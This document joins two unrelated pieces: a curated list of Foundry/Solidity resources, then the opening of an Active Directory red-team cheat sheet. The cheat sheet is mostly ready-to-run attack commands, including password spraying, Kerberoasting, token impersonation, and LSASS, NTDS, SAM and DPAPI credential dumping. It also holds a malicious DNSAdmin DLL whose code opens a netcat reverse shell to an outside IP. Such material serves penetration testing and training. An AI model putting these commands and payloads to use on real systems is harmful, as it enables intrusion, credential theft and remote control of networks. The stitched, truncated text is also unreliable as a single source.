- [Paul's Foundry Template](https://github.com/PaulRBerg/foundry-template) - @PaulRBerg's Foundry template.
- [Frankie's Forge Template](https://github.com/FrankieIsLost/forge-template) - @FrankieIsLost's template for quickly getting started with Forge.
- [Immunefi's PoC Templates](https://github.com/immunefi-team/forge-poc-templates) - @immunefi-team's templates for quickly getting started with a proof of concept for testing vulnerabilities.
- [Foundry Hardhat Template](https://github.com/foundry-rs/hardhat-foundry-template) - Template repository for getting started quickly with Hardhat and Foundry in one project.
- [Foundry Vyper](https://github.com/0xKitsune/Foundry-Vyper) - A Foundry template to compile and test Vyper contracts.
- [Foundry Starter Kit](https://github.com/smartcontractkit/foundry-starter-kit) - Foundry Starter Kit is a repo that shows developers how to quickly build, test, and deploy smart contracts with one of the fastest frameworks out there.
- [Foundry Hardhat TypeScript Template](https://github.com/pcaversaccio/hardhat-project-template-ts) - A fully-fledged Hardhat project template based on TypeScript that includes the Foundry toolkit.
- [Foundry Vulcan Template](https://github.com/nomoixyz/vulcan-template) - This repository is a template for smart contract projects based on Foundry. It includes Vulcan to make your life easier when writing tests and scripts.
- [Foundry <> Python Differential Fuzz Testing Template](https://github.com/kjr217/foundry-python-template) - A lot of financial quant work gets modelled in Python, and sometimes these models need to be implemented in Solidity to be used in a protocol.
- [Solady](https://github.com/Vectorized/solady) - Gas optimized Solidity libraries.
- [Solidify](https://github.com/proofxyz/solidify) - solidify is a golang + solidity library aimed at making the storage of arbitrary data on EVM blockchains as easy and efficient as possible.
- [Solmate](https://github.com/transmissions11/solmate) - Modern, opinionated, and gas optimized building blocks for smart contract development.
- [Chain Claim](https://github.com/botdad/chain-claim) - Solidity lib and helper scripts for providing claim code generation and on-chain verification of a claim.
- [Playpen](https://github.com/ZeframLou/playpen) - Set of modern, gas optimized staking pool contracts.
- [TokenMigrator](https://github.com/ZeframLou/token-migrator) - A simple contract for migrating from an old ERC20 token to a new ERC20 token.
- [VestedERC20](https://github.com/ZeframLou/vested-erc20) - A wrapper ERC20 token that linearly vests an underlying ERC20 token to its holders.
- [forge-gas-snapshot](https://github.com/marktoda/forge-gas-snapshot) - A flexible gas snapshotting library for forge tests.
- [lil web3](https://github.com/m1guelpf/lil-web3/) - Small, focused, utility-based smart contracts.
- [RollCall](https://github.com/withtally/rollcall) - Rollup governance libraries.
- [Forge Optimism](https://github.com/tarrencev/forge-optimism) - Forge Optimism is a collection of helpful contracts for use with forge and foundry on Optimism.
- [Yearn Strategy Foundry Mix](https://github.com/storming0x/foundry_strategy_mix) - Basic Solidity smart contract for creating your own Yearn strategy.
- [Foundry-Hardhat-Diamonds](https://github.com/Timidan/Foundry-Hardhat-Diamonds) - Sleek EIP-2535 Diamond deployments on the go with Foundry.
- [Foundry Lens Protocol](https://github.com/memester-xyz/lens-protocol#foundry-setup) - Lens Protocol fork that supports Foundry.
- [XChain](https://github.com/zobront/xchain) - Cross-chain call library for Solidity & Foundry.
- [Solenv](https://github.com/memester-xyz/solenv) - A dotenv parser for Solidity & Foundry.
- [surl](https://github.com/memester-xyz/surl/) - HTTP library for Foundry tests in Solidity, based on curl.
- [unix](https://github.com/abigger87/unix) - A lightweight, extensible Foundry library for shell scripting.
- [Chainlink Brownie Contracts](https://github.com/smartcontractkit/chainlink-brownie-contracts) - This repository is a slimmed down version of Chainlink's official repo. It clones only the Chainlink contracts folder, and the repo automatically updates every time there is a new NPM release.
- [Upgradeable Contracts With OpenZeppelin and Foundry](https://github.com/jordaniza/OZ-Upgradeable-Foundry) - A minimal set of contracts showing how to implement UUPS and Transparent Upgradeable Proxy contracts using Foundry, along with testing and deployment with Forge Script.
- [Foundry Upgrades](https://github.com/odyslam/foundry-upgrades) - Helper smart contracts to deploy and manage upgradeable contracts on Ethereum.
- [PRBMath](https://github.com/paulrberg/prb-math) - Solidity library for advanced fixed-point math that operates with signed 59.18-decimal fixed-point and unsigned 60.18-decimal fixed-point numbers.
- [ChugSplash Foundry](https://github.com/chugsplash/chugsplash-foundry#readme) - A Foundry library for deploying and managing upgradeable smart contracts.
- [Invariant Examples](https://github.com/lucas-manuel/invariant-examples#readme) - This repository functions as an accessible example for Foundry developers to experiment with and learn about invariant testing.
- [Foundry Multichain](https://github.com/timurguvenkaya/foundry-multichain) - This repo provides an example of a multichain Solidity deployment/upgradability script pattern.
- [Foundry Safer Log](https://github.com/Philogy/forge-safe-log) - The safelog library provides a foundry/hardhat-like console logging interface whereby the individual log functions do not modify the state of memory.
- [Diamond-Foundry](https://github.com/FydeTreasury/Diamond-Foundry) - Foundry implementation of the EIP-2535 Diamond standard.
- [balance-snapshot](https://github.com/pilagod/balance-snapshot) - A Solidity library to improve balance change checks in Foundry tests.
- [Cannon](https://usecannon.com/) - Continuous configuration automation & development CLI multi-tool. Like Terraform, Docker, and NPM for Ethereum.

## Tutorials

- [Getting Started by Crisgarner](https://mirror.xyz/crisgarner.eth/BhQzl33tthkJJ3Oh2ehAD_2FXGGlMupKlrUUcDk0ALA) - Short intro tutorial for getting started.
- [Getting Started by Wilson](https://w.mirror.xyz/mOUlpgkWA178HNUW7xR20TdbGRV6dMid7uChqxf9Z58) - Extended tutorial with information about testing and logging.
- [Getting Started by What The Func?](https://youtu.be/wqFnif_6Mbc) - Video tutorial.
- [How to Foundry with Brock Elmore](https://www.youtube.com/watch?v=Rp_V7bYiTCM) - YouTube live-coding tutorial on how to get started with Foundry.
- [Foundry Book](https://book.getfoundry.sh/) - A book on all things Foundry.
- [Learn Solidity, Blockchain Development, & Smart Contracts](https://www.youtube.com/watch?v=umepbfKp5rI&ab_channel=PatrickCollins) - Full introduction course covering all of the core concepts related to blockchain, smart contracts, Solidity, ERC20s, full-stack Web3 dapps, decentralized finance (DeFi), Chainlink, Ethereum, upgradable smart contracts, DAOs, Aave, IPFS, and more; everything built with Foundry. Video 1 out of 3.
- [Mainnet Forking](https://mirror.xyz/susheen.eth/bRCzT2QLdNINMVk8251udkfjHW_T9ascCQ1DV9hURz0) - This article teaches how to locally simulate a swap on Uniswap.
- [Ethernaut x Foundry](https://github.com/ciaranmcveigh5/ethernaut-x-foundry) - Ethernaut puzzles solved & tested with Foundry.
- [Damn Vulnerable Defi - Foundry Version](https://github.com/nicolasgarcia214/damn-vulnerable-defi-foundry) - The Damn Vulnerable Defi CTF using Foundry.
- [Getting Started (Chinese)](https://learnblockchain.cn/article/3502) - Getting started tutorial in Chinese.
- [Foundry vs Hardhat](https://chainstack.com/foundry-hardhat-differences-performance/) - Differences in performance and developer experience.
- [Smart Contract Development with Foundry](https://www.youtube.com/watch?v=uelA2U9TbgM) - Extended video tutorial on Foundry covering tests, deployments, cast usage, and deploying to a live network.
- [DeFiHackLabs](https://github.com/SunWeb3Sec/DeFiHackLabs) - Reproduce DeFi hack incidents using Foundry.
- [DeFiVulnLabs](https://github.com/SunWeb3Sec/DeFiVulnLabs) - Learn common smart contract vulnerabilities using Foundry.
- [How to test a contract function a million times](https://www.notonlyowner.com/learn/how-to-test-a-smart-contract-function-a-million-times/) - Tutorial about testing a function of the OpenZeppelin Contracts library using Foundry fuzzing.
- [forge inspect $CONTRACT Tweetstorm by @w1nt3r_eth](https://twitter.com/w1nt3r_eth/status/1579486967963693057) - Twitter thread about how to use forge inspect $CONTRACT ir-optimized.
- [Fork testing with Foundry against a specific block number?](https://twitter.com/PaulRBerg/status/1603057723985301507?utm_source=substack&utm_medium=email) - Pro tip by @PaulRBerg.
- [Using Foundry to Explore Upgradeable Contracts (Part 1)](https://runtimeverification.com/blog/using-foundry-to-explore-upgradeable-contracts-part-1) - Using Foundry tests to illustrate the various techniques used to make contracts upgradeable.
- [Foundry Best Practices](https://book.getfoundry.sh/tutorials/best-practices) - This guide documents the suggested best practices when developing with Foundry. In general, it's recommended to handle as much as possible with forge fmt; anything it doesn't handle is covered there.
- [Invariant Testing WETH With Foundry](https://mirror.xyz/horsefacts.eth/Jex2YVaO65dda6zEyfM_-DXlXhOWCAoSpOx5PLocYgw) - In this short guide, we'll write invariant tests from the ground up for Wrapped Ether, one of the most important contracts on mainnet.
- [Tic Tac Token](https://book.tictactoken.co/) - Tic Tac Token will teach you Foundry from the ground up while you create Tic Tac Toe and learn how to write and test Solidity smart contracts using Foundry.

## Projects Using Foundry

- [0xHacked](https://github.com/0xHackedLabs/zkProver) - A trustless bug bounty platform built on zero-knowledge proofs, where a whitehat can submit a proof of exploit to claim a bug bounty without disclosing any details. We referred to the implementation of Foundry.
- [Art Gobblers](https://github.com/artgobblers/art-gobblers) - Contracts for Art Gobblers, the self-sustaining art factory, with a custom ERC721 implementation with VRGDAs, GOO integration and differential fuzzing.
- [OpenSea Seaport](https://github.com/ProjectOpenSea/seaport) - Seaport is a new marketplace protocol for safely and efficiently buying and selling NFTs.
- [Optimism Contracts Bedrock](https://github.com/ethereum-optimism/optimism/tree/develop/packages/contracts-bedrock) - This package contains the smart contracts that compose the on-chain component of Optimism's upcoming Bedrock upgrade.
- [MapleLoan](https://github.com/maple-labs/loan) - Set of contracts to facilitate on-chain loans between Maple Finance pools and institutional borrowers.
- [Cryptex Finance](https://github.com/cryptexfinance/contracts) - Index token that tracks the total cryptocurrency market capitalization. (Optimism version uses Foundry tests).
- [Gov of Venice](https://github.com/pentagonxyz/gov-of-venice) - Governance of Venice is a new paradigm in DAO governance, attempting to standardise the existence of functional groups within DAOs (Guilds) in terms of how they participate in the governance process of different DAOs.
- [Beefy Finance](https://github.com/beefyfinance/beefy-contracts) - Official repo for strategies and vaults from the Beefy yield optimizer.
- [DeFi Hacks Reproduce - Foundry](https://github.com/SunWeb3Sec/DeFiHackLabs) - Reproduce DeFi hack incidents using Foundry.
- [Tokenlon](https://github.com/consenlabs/tokenlon-contracts) - Tokenlon is a decentralized exchange and payment settlement protocol.
- [Uniswap V3 Development Book](https://uniswapv3book.com/) - Development book about Uniswap V3 built using Foundry.
- [Uniswap Permit](https://github.com/Uniswap/permit2) - Permit2 introduces a low-overhead, next generation token approval/meta-tx system to make token approvals easier, more secure, and more consistent across applications.

**[⬆ back to top](#awesome-foundry)**
A curated list of awesome resources for the Foundry development framework.
null
0
29
35
115
0
1
0
RistBS/Awesome-RedTeam-Cheatsheet
---

![image](https://user-images.githubusercontent.com/75935486/169690637-2f7bd0c1-0799-4e6e-b38c-809f086ea156.png)

---

# Red Team Techniques

- [Initial Access Techniques](https://github.com/RistBS/Awesome-RedTeam-Cheatsheet/blob/master/Techniques/Initial%20Access%20Techniques.md) (soon)
- [Code Execution Techniques](https://github.com/RistBS/Awesome-RedTeam-Cheatsheet/blob/master/Techniques/Code%20Execution%20Techniques.md) (soon)
- [Lateral Movement Techniques](https://github.com/RistBS/Awesome-RedTeam-Cheatsheet/blob/master/Techniques/Lateral%20Mouvement%20Techniques.md) (soon)
- [Evasion Techniques](https://github.com/RistBS/Awesome-RedTeam-Cheatsheet/blob/master/Techniques/Evasion%20Techniques.md) (soon)
- [Persistence Techniques](https://github.com/RistBS/Awesome-RedTeam-Cheatsheet/blob/master/Techniques/Persistence%20Techniques.md) (soon)
- [Privilege Escalation Techniques](https://github.com/RistBS/Awesome-RedTeam-Cheatsheet/blob/master/Techniques/Privilege%20Escalation%20Techniques.md) (soon)
- [Credential Dumping Techniques](https://github.com/RistBS/Awesome-RedTeam-Cheatsheet/blob/master/Techniques/Credential%20Dumping%20Techniques.md) (soon)
- [Pivoting Techniques](https://github.com/RistBS/Awesome-RedTeam-Cheatsheet/blob/master/Techniques/Pivoting%20Cheatsheet.md) (soon)

---

## Windows Protocols and Terminologies

- **[Windows Protocols and Terminologies Guide](https://github.com/RistBS/Awesome-RedTeam-Cheatsheet/blob/master/Active%20Directory%20Protcols%20Guide.md) (soon)**

---

## Miscs

- [OPSEC Guide](https://github.com/RistBS/Awesome-RedTeam-Cheatsheet/blob/master/Miscs/OPSEC%20Guide.md)
- [Malware Development](https://github.com/RistBS/Awesome-RedTeam-Cheatsheet/blob/master/Miscs/Malware%20Development.md)
- [Attacking AD Azure Cloud](https://github.com/RistBS/Awesome-RedTeam-Cheatsheet/blob/master/Miscs/Attacking%20AD%20Azure%20Cloud.md) (soon)

---

# Support

**You can support me here :cat: :**

<a href="https://www.buymeacoffee.com/RistBS"><img width=300 src="https://img.buymeacoffee.com/button-api/?text=Buy me a Pizza&emoji=🍕&slug=bsolomon&button_colour=5F7FFF&font_colour=000000&font_family=Poppins&outline_colour=000000&coffee_colour=ffffff"></a>

# Active-directory-Cheat-sheet

This AD attack cheat sheet, made by RistBS, is inspired by the [Active-Directory-Exploitation-Cheat-Sheet](https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet) repo.
## Summary

- [AD Exploitation Cheat Sheet by RistBS](#active-directory-cheat-sheet)
- [Summary](#summary)
- [Tools](#tools)
- [Powershell Components](#powershell-components)
- [Powershell Tricks](#powershell-tricks)
- [PSWA Abusing](#pswa-abusing)
- [Enumeration](#enumeration)
- [GPO enumeration](#gpo-enumeration)
- [ACL and ACE enumeration](#acl-and-ace-enumeration)
- [RID Cycling](#rid-cycling)
- [Privilege Escalation](#privilege-escalation)
- [Token Impersonation](#token-impersonation)
- [Kerberoasting](#kerberoasting)
- [ASREPRoasting](#asreproasting)
- [DNSAdmin](#dnsadmin)
- [Lateral Movement](#lateral-movement)
- [WMIExec](#wmiexec)
- [Credentials Dumping](#credentials-dumping)
- [LSASS Dumping](#lsass-dumping)
- [NTDS Dumping](#ntds-dumping)
- [DPAPI Abusing](#dpapi-abusing)
- [LSA Dumping](#lsa-dumping)
- [SAM Dumping](#sam-dumping)
- [Dump Registry Remotely and Directly](#dump-registry-remotely-and-directly)
- [Read GMSA Passwords](#read-gmsa-password)
- [Hash Cracking](#hash-cracking)
- [Bruteforce AD Password](#bruteforce-ad-password)
- [Custom Username and Password wordlist](#custom-username-and-password-wordlist)
- [Pivoting](#pivoting)
- [SMB Pipes](#smb-pipes)
- [SharpSocks](#sharpsocks)
- [RDP Tunneling via DVC](#rdp-tunneling-via-dvc)
- [Persistence](#persistence)
- [SIDHistory Injection](#sidhistory-injection)
- [AdminSDHolder and SDProp](#adminsdholder-and-sdprop)
- [ACLs and ACEs Abusing](#acls-and-aces-abusing)
- [GenericAll](#genericall)
- [Enhanced Security Bypass](#enhanced-security-bypass)
- [AntiMalware Scan Interface](#antimalware-scan-interface)
- [ConstrainLanguageMode](#constrainlanguagemode)
- [Just Enough Administration](#just-enough-administration)
- [ExecutionPolicy](#executionpolicy)
- [RunAsPPL for Credentials Dumping](#runasppl-for-credentials-dumping)
- [ETW Disabling](#etw-disabling)
- [MS Exchange](#ms-exchange)
- [OWA, EWS and EAS Password Spraying](#owa-ews-and-eas-password-spraying)
- [GAL and OAB Extraction](#gal-and-oab-extraction)
- [PrivExchange](#privexchange)
- [ProxyLogon](#proxylogon)
- [CVE-2020-0688](#cve-2020-0688)
- [MSSQL Server](#mssql-server)
- [UNC Path Injection](#unc-path-injection)
- [MC-SQLR Poisoning](#mc-sqlr-poisoning)
- [DML, DDL and Logon Triggers](#dml-ddl-and-logon-triggers)
- [Forest Persistence](#forest-persistence)
- [DCShadow](#dcshadow)
- [Cross Forest Attacks](#cross-forest-attacks)
- [Trust Tickets](#trust-tickets)
- [Using KRBTGT Hash](#using-krbtgt-hash)
- [Azure Active Directory (AAD)](#azure-active-directory)
- [AZ User Enumeration](#az-user-enumeration)
- [PowerZure](#powerzure)
- [Golden SAML](#golden-saml)
- [PRT Manipulation](#prt-manipulation)
- [MSOL Service Account](#msol-service-account)
- [Miscs](#miscs)
- [Domain Level Attribute](#domain-level-attribute)
- [MachineAccountQuota (MAQ) Exploitation](#machineaccountquota-maq-exploitation)
- [BadPwdCount](#badpwdcount)
- [Abusing IPv6 in AD](#abusing-ipv6-in-ad)
- [Rogue DHCP](#rogue-dhcp)
- [IOXIDResolver Interface Enumeration](#ioxidresolver-interface-enumeration)
- [References](#references)

## Tools

**Powershell tools :**

- `[⭐] Nishang` -> https://github.com/samratashok/nishang
  Nishang has multiple useful scripts for Windows pentesting in a PowerShell environment.
- `[⭐] PowerView` -> https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
  PowerView is a script from PowerSploit that allows enumeration of the AD architecture for potential lateral movement.
**Enumeration tools :**

- `[⭐] Bloodhound` -> https://github.com/BloodHoundAD/BloodHound
- `[⭐] crackmapexec` -> https://github.com/byt3bl33d3r/CrackMapExec

**AD exploitation toolkit :**

- `[⭐] Impacket` -> https://github.com/SecureAuthCorp/impacket
- `[⭐] kekeo` -> https://github.com/gentilkiwi/kekeo

**Dumping Tools :**

- `[⭐] mimikatz` -> https://github.com/gentilkiwi/mimikatz
- `[⭐] rubeus` -> https://github.com/GhostPack/Rubeus

**Listener Tool :**

- `[⭐] responder` -> https://github.com/SpiderLabs/Responder

## Powershell Components

### Powershell Tricks

**PS-Session** :

```powershell
# METHOD 1
$c = New-PSSession -ComputerName 10.10.13.100 -Authentication Negotiate -Credential $user
Enter-PSSession -Session $c

# METHOD 2
$pass = ConvertTo-SecureString 'Ab!Q@aker1' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential($user, $pass)
Enter-PSSession -Credential $cred -ComputerName 10.10.13.100
```

### PSWA Abusing

Allows anyone with creds to connect to any machine with any config.

**[ ! ] this action requires credentials.**

```powershell
Add-PswaAuthorizationRule -UserName * -ComputerName * -ConfigurationName *
```

## Enumeration

### Find users with SPN

> using [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) :

```powershell
Get-NetUser -SPN
```

> using [AD Module](https://docs.microsoft.com/en-us/powershell/module/activedirectory/?view=windowsserver2022-ps) :

```powershell
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
```

### Trusts Enumeration

**MapTrust :**

```powershell
Invoke-MapDomainTrust
```

**Domain trusts for the current domain :**

> using [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) :

```powershell
Get-NetDomainTrust
# Find potential external trust
Get-NetDomainTrust -Domain $domain
```

> using [AD Module](https://docs.microsoft.com/en-us/powershell/module/activedirectory/?view=windowsserver2022-ps) :

```powershell
Get-ADTrust
Get-ADTrust -Identity $domain
```

### Forest Enumeration

**Details about the current forest :**

```powershell
Get-NetForest
Get-NetForest -Forest $forest
Get-ADForest
Get-ADForest -Identity $domain
```

### GPO enumeration

**List of GPO**

```powershell
Get-NetGPO
Get-NetGPO -ComputerName $computer
Get-GPO -All
Get-GPResultantSetOfPolicy -ReportType Html -Path C:\Users\Administrator\report.html
```

### ACL and ACE enumeration

**Enumerate All ACEs**

```powershell
Get-DomainUser | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}}
```

#### Enumerate users and permissions

```powershell
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReference -match "RDPUsers"}
```

*Verify if the user already has an SPN :*

> using [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) :

```powershell
Get-DomainUser -Identity supportuser | select serviceprincipalname
```

> using [AD Module](https://docs.microsoft.com/en-us/powershell/module/activedirectory/?view=windowsserver2022-ps) :

```powershell
Get-ADUser -Identity supportuser -Properties ServicePrincipalName | select ServicePrincipalName
```

### LDAP Enumeration

```bash
ldapsearch -x -h 10.10.10.x -p 389 -s base namingcontexts
ldapsearch -h 10.10.10.x -p 389 -x -b "dc=boxname,dc=local"
```
*find service accounts*

```bash
ldapsearch -h 10.10.10.161 -p 389 -x -b "dc=box,dc=local" | grep "service"
```

*Enumeration with ldapsearch as an authenticated user*

```bash
ldapsearch -x -h ldap.megacorp.corp -w '$pass'
ldapsearch -x -h 10.10.131.164 -p 389 -b "dc=megacorp,dc=corp" -D 'john@megacorp.corp' -w 'vs2k6!'
ldapsearch -D "cn=binduser,ou=users,dc=megacorp,dc=corp" -w 'J~42%W?]g' -s base namingcontexts
ldapsearch -D "cn=binduser,ou=users,dc=megacorp,dc=corp" -w 'J~42%W?]g' -b 'dc=megacorp'
```

*Enumeration with ldapdomaindump (authenticated) with nice output*

```bash
ldapdomaindump 10.10.197.117 -u 'megacorp.corp\john' -p '$pass' --no-json --no-grep
```

*Enumeration with nmap scripts*

```bash
nmap -p 389 --script ldap-search 10.10.10.x
nmap -n -sV --script "ldap*" -p 389 10.10.10.x
nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='MEGACORP.CORP',userdb=/usr/share/wordlists/seclists/Usernames/Names/names.txt 10.10.13.100
```

### SMB Enumeration

*enumeration with crackmapexec as unauthenticated*

```bash
crackmapexec smb 10.10.10.x --pass-pol -u '' -p ''
```

*enumeration with crackmapexec (authenticated)*

```bash
crackmapexec smb 10.10.11.129 --pass-pol -u usernames.txt -p $pass --continue-on-success
crackmapexec smb 10.10.11.129 --pass-pol -u xlsx_users -p $pass --continue-on-success
```

*enumeration with kerbrute, via Kerberos pre-auth bruteforcing:*

```bash
/opt/kerbrute/dist/kerbrute_linux_amd64 userenum -d megacorp.local --dc 10.10.13.100 -o kerbrute.out users.txt
/opt/kerbrute/dist/kerbrute_linux_amd64 userenum -d megacorp.htb --dc 10.10.13.100 -o kerbrute.out users.lst --downgrade
```

> by default, kerbrute uses the most secure mode (18 = sha1) to pull hashes. Using the downgrade option we can pull the deprecated encryption type version (23 = rc4hmac). Or use GetNPUsers to get hashes instead, it's safer!
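A minimal sketch of the safer GetNPUsers approach mentioned in the note above, using impacket (the domain, DC IP and wordlist are placeholders to adapt):

```bash
# Request AS-REP hashes for accounts with Kerberos pre-auth disabled (no password needed)
GetNPUsers.py 'MEGACORP.LOCAL/' -usersfile users.txt -format hashcat -outputfile asrep_hashes.txt -dc-ip 10.10.13.100
```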
*provide a password or a list of passwords to test against users*

```bash
crackmapexec smb 10.10.13.100 --pass-pol -u users.lst -p password_list
```

*Enumerate some users*

```bash
crackmapexec smb 10.10.13.100 -u users.txt -p $pass --users | tee userlist.txt
```

### Password Spraying on the domain

```bash
/opt/kerbrute/dist/kerbrute_linux_amd64 passwordspray -d MEGACORP.CORP --dc 10.10.13.100 users.lst '$pass'
```

**Dump Domain, Groups and Users using Bloodhound-Python:**

```bash
bloodhound-python -c all -u $user -p $password -d $domain -dc $dc_domain -ns $ip --disable-pooling -w1 --dns-timeout 30
```

Setting up Bloodhound:

```bash
sudo neo4j console
sudo bloodhound
```

## RID Cycling

*Global Structure :*

```
S-1-5-21-40646273370-24341400410-2375368561-1036
```

- `S-1-5-21`: **S refers to SID (Security Identifier)**
- `40646273370-24341400410-2375368561`: **Domain or Local Computer Identifier**
- `1036`: **RID (Relative Identifier)**

*User SID Structure :*

- `S-1-5-21-40646273370-24341400410-2375368561`: **Domain SID**
- `1036`: **User RID**

> using [Crackmapexec](https://github.com/byt3bl33d3r/CrackMapExec) :

```bash
cme smb $target -u $username -p $password --rid-brute
```

> using [lookupsid](https://github.com/SecureAuthCorp/impacket/blob/cd4fe47cfcb72d7d35237a99e3df95cedf96e94f/examples/lookupsid.py) :

```bash
lookupsid.py MEGACORP/$user:'$password'@$target 20000
```

The value "20000" in lookupsid indicates how many RIDs will be tested.

## Privilege Escalation

### Token Impersonation

> The token impersonation technique allows impersonating a user by stealing their token; such tokens are available because of SSO processes, interactive logons, running processes, etc.

> using [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) :

*list tokens*

```powershell
# Show all tokens
Invoke-TokenManipulation -ShowAll
# show usable tokens
Invoke-TokenManipulation -Enumerate
```

*Start a new process with the token of a user*

```powershell
Invoke-TokenManipulation -ImpersonateUser -Username "domain\user"
```

*process token manipulation*

```powershell
Invoke-TokenManipulation -CreateProcess "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ProcessId $id
```

> using [Incognito](https://github.com/FSecureLABS/incognito) :

*load incognito and list tokens :*

```bash
meterpreter > use incognito
meterpreter > list_tokens -g
```

*impersonate token of "NT AUTHORITY\SYSTEM" :*

```powershell
meterpreter > getuid
Server username: job\john
meterpreter > impersonate_token "BUILTIN\Administrators"
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```

### Kerberoasting

**Enumerate kerberoastable users**

```powershell
Get-DomainUser -SPN | select name,serviceprincipalname
```

> using [impacket](https://github.com/SecureAuthCorp/impacket) :

```powershell
GetUserSPNs.py -outputfile kerberoastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/USER:Password'
```

> using [crackmapexec](https://github.com/byt3bl33d3r/CrackMapExec)

```powershell
crackmapexec ldap $target -u $user -p $password --kerberoasting kerberoastable.txt --kdcHost $kdc
```

*crack the hash :*

```bash
# using JTR :
john --format=krb5tgs spn.txt --wordlist=wordlist.txt
# using hashcat :
hashcat -m 13100 -a 0 spn.txt wordlist.txt --force
```

### ASREPRoasting

**Enumerate asreproastable users**

```powershell
Get-DomainUser -PreauthNotRequired | select name
```

```powershell
GetNPUsers.py -format hashcat -outputfile ASREProastables.txt -dc-ip $kdc '$domain/$user:$password' -request
```

*cracking the hash :* `hashcat -m 18200 -a 0 hash wordlist.txt --force`

### DNSAdmin

> Enumerate users in this group :

```powershell
# METHOD 1
Get-NetGroupMember -GroupName "DNSAdmins"
# METHOD 2
Get-ADGroupMember -Identity DNSAdmins
```

*This attack consists of injecting a malicious arbitrary DLL and restarting the dns.exe service; since the DC serves as a DNS service, we can elevate our privileges to DA.*

> DLL File :

```c
#include "stdafx.h"
#include <stdlib.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        system("c:\\windows\\system32\\spool\\drivers\\color\\nc.exe -e cmd.exe 10.10.14.51 5555");
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
```

you can also create a DLL file using msfvenom: `msfvenom -p windows/x64/exec cmd='net user administrator aked /domain' -f dll > evil.dll`

it'll execute `net user administrator aked /domain` with SYSTEM privileges.

Set the remote DLL path in the Windows Registry:

```powershell
dnscmd dc01 /config /serverlevelplugindll \\10.10.14.33\share\evil.dll
```

`\\10.10.14.33\share\evil.dll` : SMB share.

**restart DNS service**

```powershell
sc.exe stop dns
sc.exe start dns
```

## Lateral Movement

### WMIExec

*uses kerberos auth*

```powershell
impacket-wmiexec -k -no-pass administrator@10.10.10.248
```

## Credentials Dumping

### LSASS Dumping

```powershell
cme <protocol> <ip> -u <user> -p <pass> -M lsassy
```

- https://github.com/Hackndo/lsassy

```powershell
procdump --accepteula -ma lsass lsass.dmp
```

```powershell
smbclient.py MEGACORP.LOCAL/john@dc01.megacorp.local
# use C$
# cd Windows\Temp
# put procdump.exe
```

```powershell
psexec.py MEGACORP.LOCAL/john@dc01.megacorp.local "C:\\Windows\\Temp\\procdump.exe -accepteula -ma lsass C:\\Windows\\Temp\\lsass.dmp"
```

```powershell
smbclient.py MEGACORP.LOCAL/john@dc01.megacorp.local
# get lsass.dmp
```

> parse creds with mimikatz

```powershell
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
```

you can do it locally with mimikatz using : `sekurlsa::logonpasswords`.
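If mimikatz is not at hand, a minimal sketch of parsing the dump offline with pypykatz instead (an assumption: it is installed via `pip install pypykatz`):

```bash
# Parse the lsass minidump offline and print the recovered logon secrets
pypykatz lsa minidump lsass.dmp
```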
### NTDS Dumping

**Abusing DRSUAPI for NTDS dumping**

```powershell
crackmapexec smb 10.10.13.100 -u 'Administrator' -p $password --ntds drsuapi
```

**Abusing VSS for NTDS dumping**

> using [Crackmapexec](https://github.com/byt3bl33d3r/CrackMapExec) :

```powershell
crackmapexec smb 192.168.1.105 -u 'Administrator' -p 'Ignite@987' --ntds vss
```

*you can do it manually too.*

```powershell
vssadmin create shadow /for=C:
copy $ShadowCopyName\Windows\NTDS\NTDS.dit C:\Windows\Temp\ntds.dit.save
vssadmin delete shadows /shadow=$ShadowCopyId
```

### DPAPI Abusing

> dump DPAPI BK

```bash
dpapi.py backupkeys -t $domain/$user:$password@$target
```

> Decrypt DPAPI MK

```bash
# Decrypt DPAPI MK using BK
dpapi.py masterkey -file "/path/to/masterkey" -pvk "/path/to/backup_key.pvk"
# Decrypt DPAPI MK using MK password and user SID
dpapi.py masterkey -file "/path/to/masterkey" -sid $USER_SID -password $mk_password
```

> decrypting a protected file using MK

```bash
dpapi.py credential -file "/path/to/protected_file" -key $MASTERKEY
```

*crack DPAPI master key with JTR*

```bash
python DPAPImk2john.py --sid="$SID" --masterkey="$MASTER_KEY" --context="local"
john dpapimk.dmp --wordlist=/usr/share/wordlists/rockyou.txt --rules=custom.rule
```

### LSA Dumping

**you can use mimikatz with this command : `lsadump::secrets`**

### SAM Dumping

*save the SYSTEM hive and SAM in another directory*

```powershell
reg save HKLM\SAM c:\path\to\SAM
reg save HKLM\SYSTEM c:\path\to\SYSTEM
```

```powershell
lsadump::sam /system:c:\path\to\SYSTEM /sam:c:\path\to\SAM
```

or just use : `lsadump::sam`

**[ 📝 ] Notes** : *you can dump SAM and LSA with crackmapexec **or** secretsdump using these commands :*

```bash
secretsdump.py 'DOMAIN/USER:PASSWORD@TARGET'
```

```bash
crackmapexec smb $ip -d $domain -u $user -p $password --sam/--lsa
```

### Dump Registry Remotely and Directly

